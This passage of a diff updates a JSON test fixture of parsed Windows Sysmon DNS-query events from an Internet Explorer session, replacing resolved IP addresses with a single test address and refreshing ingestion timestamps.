Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15051,17 +14877,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -15077,14 +14903,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742236900Z", + "ingested": "2021-12-09T13:50:23.457421900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15148,12 +14973,12 @@ "type": "CNAME" }, { - "data": "152.195.32.163", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "network": { 
@@ -15169,13 +14994,13 @@ "tag.sp.advertising.com" ], "ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742245200Z", + "ingested": "2021-12-09T13:50:23.457427800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15243,17 +15068,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -15270,14 +15095,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742253700Z", + "ingested": "2021-12-09T13:50:23.457433600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15345,12 +15169,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { 
@@ -15367,13 +15191,13 @@ "cdn.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742262200Z", + "ingested": "2021-12-09T13:50:23.457439600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15452,12 +15276,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { 
@@ -15475,13 +15299,13 @@ "cdn3.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742270700Z", + "ingested": "2021-12-09T13:50:23.457445600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15549,12 +15373,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -15571,13 +15395,13 @@ "rtb0.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742279100Z", + "ingested": "2021-12-09T13:50:23.457451400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15645,12 +15469,12 @@ "type": "CNAME" }, { - "data": "20.36.236.157", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "network": { 
@@ -15667,13 +15491,13 @@ "dev.virtualearth.net" ], "ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742287900Z", + "ingested": "2021-12-09T13:50:23.457457100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
